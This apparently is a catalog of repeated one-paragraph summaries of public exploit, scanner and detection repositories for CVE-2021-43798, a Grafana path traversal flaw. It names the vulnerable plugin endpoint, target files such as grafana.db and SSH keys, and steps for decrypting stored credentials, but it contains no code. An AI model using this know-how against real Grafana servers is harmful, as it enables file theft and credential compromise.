CVE-2021-43798

This Python script exploits a directory traversal vulnerability in Grafana (CVE-2021-43798) by sending crafted HTTP requests to read arbitrary files on the target system. It leverages the `/public/plugins/` endpoint with traversal sequences to bypass restrictions.

This repository contains a Go-based proof-of-concept for decrypting Grafana data source passwords encrypted with AES-256 (CFB/GCM). It leverages the known `secret_key` from Grafana's configuration to reverse the encryption applied to sensitive fields like passwords stored in `secureJsonData`.

This repository contains a functional exploit for CVE-2021-43798, a path traversal vulnerability in Grafana. The tool automates detection, key extraction, and decryption of the Grafana database to expose data source credentials.

This is a functional proof-of-concept exploit for CVE-2021-43798, an unauthorized arbitrary file read vulnerability in Grafana. The script tests multiple payloads to read sensitive files (e.g., /etc/passwd, grafana.db) and decrypts credentials from the database using a secret key.

This repository contains a functional exploit for CVE-2021-43798, a pre-authentication path traversal vulnerability in Grafana 8.x. The exploit allows attackers to read arbitrary files from the server, including sensitive configuration files and the SQLite database.

This repository contains a Go-based proof-of-concept exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. The tool can verify and exploit the vulnerability to read sensitive files like /etc/passwd or Grafana's database.

This repository contains a Nuclei template for detecting CVE-2021-43798, a path traversal vulnerability in Grafana 8.x allowing arbitrary file read. The template includes payloads for both Windows and Linux systems, targeting sensitive files like /etc/passwd and c:/windows/win.ini.

This repository contains a Python script that exploits CVE-2021-43798, an unauthenticated arbitrary file read vulnerability in Grafana. The script checks for the vulnerability by attempting to read the /etc/passwd file via path traversal in the public/plugins endpoint.

This PoC exploits CVE-2021-43798, an arbitrary file read vulnerability in Grafana, by sending crafted requests to read sensitive files like /etc/passwd. It iterates through a list of plugin paths to confirm the vulnerability.

This repository contains a Python script that exploits CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. The script tests multiple paths to read sensitive files like /etc/passwd by leveraging directory traversal via plugin paths.

This repository contains a Python script that scans for CVE-2021-43798, a directory traversal vulnerability in Grafana. The script checks for the presence of the vulnerability by attempting to read the /etc/passwd file through a crafted URL.

This repository contains a Python script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana, to decrypt DataSource passwords from the `grafana.db` file using the `secret_key` from `grafana.ini`. The script includes functions for both decryption and encryption using AES-CFB and AES-GCM modes.

This repository contains a proof-of-concept exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana. The tool automates detection, extracts secret keys, decrypts the server-side database, and outputs data source information.

This is a Ruby script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana. It attempts to read the /etc/passwd file by traversing directories via a crafted URL path.

This exploit demonstrates a directory traversal vulnerability in Grafana, allowing arbitrary file read via path manipulation in the plugin endpoint. The PoC sends crafted requests to read files like /etc/passwd.

This PoC exploits CVE-2021-43798, a directory traversal vulnerability in Grafana, to leak sensitive files like /etc/passwd. It includes version detection and multi-threaded scanning capabilities.

This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It allows arbitrary file read by manipulating the plugin path in the URL.

This is a Python-based automated exploit tool for CVE-2021-43798, a path traversal vulnerability in Grafana. It scans for vulnerable plugins and extracts sensitive files such as SSH keys and system configuration files.

This is a functional exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana versions 8.0.0 to 8.3.0. It automates the discovery of vulnerable paths and provides an interactive shell to read arbitrary files from the target system.

This repository contains a Python script to decrypt and encrypt sensitive data in Grafana, leveraging the AES algorithm with a secret key from the configuration file. It addresses CVE-2021-43798, which involves the exposure of encrypted data source passwords.

This repository contains a Python script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana 8.x, allowing unauthorized attackers to read arbitrary files on the server. The script includes a multi-threaded scanner to test multiple endpoints and verify the vulnerability.

This Go-based exploit targets CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. It iterates through a list of plugin IDs to construct paths for reading sensitive files via directory traversal.

This repository contains functional Python tools for decrypting Grafana passwords from both AES-256 encrypted data sources and PBKDF2_HMAC_SHA256 user hashes, leveraging CVE-2021-43798 path traversal to extract the database and configuration files.

This repository contains functional Python tools for decrypting Grafana passwords from AES-256 encrypted hashes and converting PBKDF2_HMAC_SHA256 hashes for Hashcat cracking, specifically targeting post-exploitation after CVE-2021-43798 path traversal.

This repository contains a Python toolkit for decrypting Grafana passwords extracted via CVE-2021-43798, a path traversal vulnerability. It includes tools to decrypt AES-256 encrypted passwords and convert PBKDF2 hashes for cracking with Hashcat.

This exploit leverages a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0 to read arbitrary files. It iterates through a list of known plugins to find a vulnerable endpoint and retrieves the specified file.

This is a functional PoC for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 to 8.3.0. The script attempts to read arbitrary files (default: /etc/passwd) by exploiting path traversal in the `/public/plugins/` endpoint.

This is a Python-based exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It leverages vulnerable plugins to read arbitrary files from the target system by sending crafted HTTP requests.

This repository contains a Python-based proof-of-concept exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana. The exploit leverages path traversal to read sensitive files like /etc/passwd by manipulating the plugin URL path.

This is a functional exploit for CVE-2021-43798, a path traversal vulnerability in Grafana versions 8.0.0-beta1 to 8.3.0. It checks for vulnerable plugins and reads arbitrary files via directory traversal.

This repository contains a working proof-of-concept for CVE-2021-43798, a directory traversal vulnerability in Grafana. The exploit leverages improper path validation in the `/public/plugins` endpoint to read arbitrary files on the server.

This repository contains a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. It includes a PoC for arbitrary file reads and a helper tool to decrypt Grafana secrets.

This repository contains a functional Python-based exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana 8.x. The exploit automates file retrieval via the `/public/plugins/` endpoint, supporting both interactive and batch modes, with features like file download, binary handling, and automated loot collection.

The repository contains a functional Python script that exploits CVE-2021-43798, a path traversal vulnerability in Grafana. The script attempts to read arbitrary files (e.g., /etc/passwd) by manipulating plugin paths in the URL.

This repository contains a functional Python exploit for CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana versions 8.0.0 to 8.3.0. The exploit automates the process of testing multiple payloads and paths to read sensitive files, including the Grafana database and configuration files, and attempts to decrypt passwords using the secret key.

This repository contains a functional Python exploit for CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana versions 8.0.0 to 8.3.0. The exploit automates directory traversal attacks to read sensitive files like /etc/passwd and grafana.db, and includes decryption logic for extracting passwords from the database.

This repository contains a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. The Python script automates the discovery of vulnerable paths and allows reading arbitrary files from the target system.

This repository contains a functional exploit PoC for CVE-2021-43798, a path traversal vulnerability in Grafana. The script attempts to read the /etc/passwd file by exploiting the vulnerability in the public/plugins endpoint.

This repository contains a functional exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. The exploit uses path traversal via plugin endpoints to read sensitive files like /etc/passwd.

This repository contains two bash scripts that exploit CVE-2021-43798, a path traversal vulnerability in Grafana. The scripts enumerate vulnerable plugins and attempt to read sensitive files on both Windows and Linux systems.

This PoC demonstrates a path traversal vulnerability in Grafana (CVE-2021-43798) by exploiting improper sanitization in the /public/plugins/:pluginId endpoint to read arbitrary files like /etc/passwd. It includes a multi-threaded scanner to test multiple URLs for vulnerability.

This script exploits CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana 8.x, by sending a crafted HTTP request to read arbitrary files via path traversal. It uses curl to fetch files from the target system and displays the output with colored formatting.

This repository contains a Bash script designed to test for path traversal vulnerabilities in Grafana by sending HTTP requests to a list of paths and capturing successful responses. It automates the process of checking for CVE-2021-43798 by leveraging curl with the --path-as-is flag to bypass path normalization.

This is a functional exploit for CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana. It automates the discovery of vulnerable plugins and extracts sensitive files like `/etc/passwd` and `grafana.ini`.

This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It allows arbitrary file read on both Windows and Linux systems by leveraging path traversal techniques.

This is a Python script that exploits a directory traversal vulnerability in Grafana 8.3.0, allowing an attacker to read arbitrary files on the server. The script provides an interactive interface for specifying files to read via a crafted URL path.

This is a Python-based automated exploit tool for CVE-2021-43798, targeting Grafana's path traversal vulnerability to extract sensitive files like SSH keys and configuration files. It includes functionality for scanning single or multiple targets and downloading exposed files.

This repository provides a working proof-of-concept for CVE-2021-43798, a directory traversal vulnerability in Grafana versions prior to 8.3.1. It includes curl commands to exploit the vulnerability and read arbitrary files on the server.

This PoC exploits a directory traversal vulnerability (CVE-2021-43798) in Grafana by sending a crafted HTTP GET request to access sensitive files (e.g., /etc/passwd) via path traversal sequences. The script uses the requests library to fetch the file contents from the target server.

This repository provides a writeup and instructions for exploiting CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. It includes steps for using Burp Suite to exploit the vulnerability and access local files.

This PoC exploits CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. It checks the target's version and performs an LFI attack to read sensitive files like /etc/passwd or Windows hosts file.

This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It allows unauthorized arbitrary file read by leveraging a path traversal attack via the `/public/plugins/` endpoint.

This PoC exploits CVE-2021-43798, a path traversal vulnerability in Grafana, to read arbitrary files (e.g., /etc/passwd) and steal SSH keys for privilege escalation. It automates the process of identifying vulnerable plugins, exfiltrating sensitive data, and attempting privilege escalation via SUID binaries.

This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 to 8.3.0. It allows arbitrary file reads by manipulating the plugin path parameter.

This repository contains a Rust-based scanner for detecting the Grafana path traversal vulnerability (CVE-2021-43798). It checks for the presence of the vulnerability by attempting to read sensitive files (e.g., /etc/passwd) via crafted HTTP requests.

This repository provides a proof-of-concept for CVE-2021-43798, a directory traversal vulnerability in Grafana. The exploit allows unauthorized file read access via a crafted HTTP GET request to the `/public/plugins/` endpoint.

The repository contains only a README.md file with the CVE identifier and no exploit code or technical details. It appears to be a placeholder or stub.

The repository contains a functional Python script that exploits CVE-2021-43798, a path traversal vulnerability in Grafana, allowing unauthenticated attackers to read arbitrary files from the server. The script checks for the vulnerability by attempting to read /etc/passwd via a crafted URL path.

This repository contains a functional Python script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana 8.3.0. The script allows an attacker to read arbitrary files on the target system by sending crafted HTTP requests.

This repository contains a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. The exploit automates the process of checking for vulnerable versions and retrieving local files via crafted requests to the vulnerable endpoint.

This repository contains a functional exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana. The exploit leverages path traversal via the `/public/plugins/grafana-clock-panel/` endpoint to read sensitive files like `/etc/passwd`.

This repository contains a functional exploit for CVE-2021-43798, a pre-authentication path traversal vulnerability in Grafana 8.x. The exploit leverages the `/public/plugins/:pluginId` endpoint to read arbitrary files on the filesystem by manipulating the path parameter.

This Metasploit module exploits a directory traversal vulnerability in Grafana (CVE-2021-43798) by leveraging plugin paths to access arbitrary files. It checks for vulnerable versions and attempts to retrieve specified files using traversal sequences.